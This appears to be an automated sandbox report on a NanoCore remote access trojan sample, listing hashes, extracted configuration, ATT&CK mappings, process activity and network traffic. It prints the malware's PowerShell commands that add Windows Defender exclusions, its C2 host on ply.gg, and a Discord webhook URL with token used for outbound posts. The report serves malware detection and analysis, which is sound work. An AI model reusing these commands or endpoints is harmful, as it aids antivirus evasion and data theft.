nanocore | 4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06/12/2024, 22:05 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe
Size

399KB
MD5

153deb0e0ffc0b476d5bba8a69778dde
SHA1

4ef44b30281e61ffdb74c4b3c0ec5e5bab8fa08f
SHA256

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607
SHA512

00f58ffa67c2ee992f1904a3a923e80ee350956b4690eadd9dbfa8b4e6897ab4d598493f1bca3781cca0849184a3a40f21424efcc3e90d436d76540da5a89bf4
SSDEEP

6144:GSI/6NlBkO6avy/eiZ8y6lT+taYVZOq/y4bRwDJm1RU78h1ixeRd7:GSO6NlBkO6avy/eySdYNaNm1RU7vxC

Score

10^/10

nanocore evasion execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

original-financial.gl.at.ply.gg:28916

Mutex

d516db18-d565-4fff-a872-0ad0fd1f18ca

Attributes

activate_away_mode
true
backup_connection_host
original-financial.gl.at.ply.gg
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2024-09-13T19:32:56.304391136Z
bypass_user_account_control
true
bypass_user_account_control_data
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
28916
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
d516db18-d565-4fff-a872-0ad0fd1f18ca
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
true
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4732	powershell.exe
5012	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

Executes dropped EXE 1 IoCs

pid	Process
3292	wlanext.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wlanext.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	discord.com
6	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4732	powershell.exe
4732	powershell.exe
5012	powershell.exe
5012	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	4996	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe
Token: SeBackupPrivilege	1484	vssvc.exe
Token: SeRestorePrivilege	1484	vssvc.exe
Token: SeAuditPrivilege	1484	vssvc.exe
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	5012	powershell.exe
Token: SeDebugPrivilege	3292	wlanext.exe
Token: SeDebugPrivilege	3292	wlanext.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4996 wrote to memory of 4732	4996	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe	87
PID 4996 wrote to memory of 4732	4996	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe	87
PID 4996 wrote to memory of 5012	4996	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe	89
PID 4996 wrote to memory of 5012	4996	4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe	89

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe
"C:\Users\Admin\AppData\Local\Temp\4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4996
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\wlanext.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wlanext.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5012

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484

C:\Users\Admin\AppData\Roaming\wlanext.exe
C:\Users\Admin\AppData\Roaming\wlanext.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3292

Network

DNS

ip-api.com

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/csv/?fields=status,query

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

Remote address:

208.95.112.1:80

Request

GET /csv/?fields=status,query HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 06 Dec 2024 22:05:58 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 23
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.128.233
POST

https://discord.com/api/webhooks/1309139150745767976/HQCehpMu-KtqFAfY5A9H8ltBqh_UTqjI4T4_keZiaZg4sYn-QeNjnUc6uMmugqGcqCJE

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1309139150745767976/HQCehpMu-KtqFAfY5A9H8ltBqh_UTqjI4T4_keZiaZg4sYn-QeNjnUc6uMmugqGcqCJE HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: discord.com
Content-Length: 139
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Fri, 06 Dec 2024 22:05:59 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1733522761
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yTKcbsiEuvaR52mMX9kGUY7NfrgPkcB%2FH9emr%2FoM89X1EmUDNTJkGPGzTZdSClq02M6DIcJHEih3yyl%2BYDRs%2BV6QigqptzGVHt4RbG2SNayVoD93CopKVzz3aY2W"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=6c54ae77c69c248e9ebc24165b64d866513e09a6-1733522759; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=vBnKqqgY6LgIFBccHpffucrTDjjpf_M.Wp5RyJOyduE-1733522759878-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8edf94a02a75886e-LHR
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

232.138.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.138.159.162.in-addr.arpa

IN PTR

Response
DNS

73.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.31.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

19.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.229.111.52.in-addr.arpa

IN PTR

Response

208.95.112.1:80

http://ip-api.com/csv/?fields=status,query

http

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

314 B
285 B
5
2

HTTP Request

GET http://ip-api.com/csv/?fields=status,query

HTTP Response

200
162.159.138.232:443

https://discord.com/api/webhooks/1309139150745767976/HQCehpMu-KtqFAfY5A9H8ltBqh_UTqjI4T4_keZiaZg4sYn-QeNjnUc6uMmugqGcqCJE

tls, http

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

1.1kB
4.7kB
9
9

HTTP Request

POST https://discord.com/api/webhooks/1309139150745767976/HQCehpMu-KtqFAfY5A9H8ltBqh_UTqjI4T4_keZiaZg4sYn-QeNjnUc6uMmugqGcqCJE

HTTP Response

404
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe
127.0.0.1:9033

wlanext.exe

8.8.8.8:53

ip-api.com

dns

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

discord.com

dns

4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.138.232

162.159.135.232

162.159.136.232

162.159.137.232

162.159.128.233
8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

232.138.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.138.159.162.in-addr.arpa
8.8.8.8:53

73.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

73.31.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

19.229.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

19.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_crtkal0q.ci0.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\wlanext.exe

Filesize
399KB

MD5
153deb0e0ffc0b476d5bba8a69778dde

SHA1
4ef44b30281e61ffdb74c4b3c0ec5e5bab8fa08f

SHA256
4ba3120b20dadb2ba430ca2bb5cb492bf0adbb4a6685c4c757086e6f46d5d607

SHA512
00f58ffa67c2ee992f1904a3a923e80ee350956b4690eadd9dbfa8b4e6897ab4d598493f1bca3781cca0849184a3a40f21424efcc3e90d436d76540da5a89bf4

Download Submit
memory/3292-38-0x000000001AD40000-0x000000001AD7A000-memory.dmp

Filesize
232KB

Download
memory/4732-12-0x000002A7A1B70000-0x000002A7A1B92000-memory.dmp

Filesize
136KB

Download
memory/4732-13-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download
memory/4732-14-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download
memory/4732-15-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download
memory/4732-18-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download
memory/4996-0-0x00007FFCD44C3000-0x00007FFCD44C5000-memory.dmp

Filesize
8KB

Download
memory/4996-2-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download
memory/4996-1-0x0000000000380000-0x00000000003EA000-memory.dmp

Filesize
424KB

Download
memory/4996-36-0x000000001B020000-0x000000001B122000-memory.dmp

Filesize
1.0MB

Download
memory/4996-37-0x00007FFCD44C0000-0x00007FFCD4F81000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.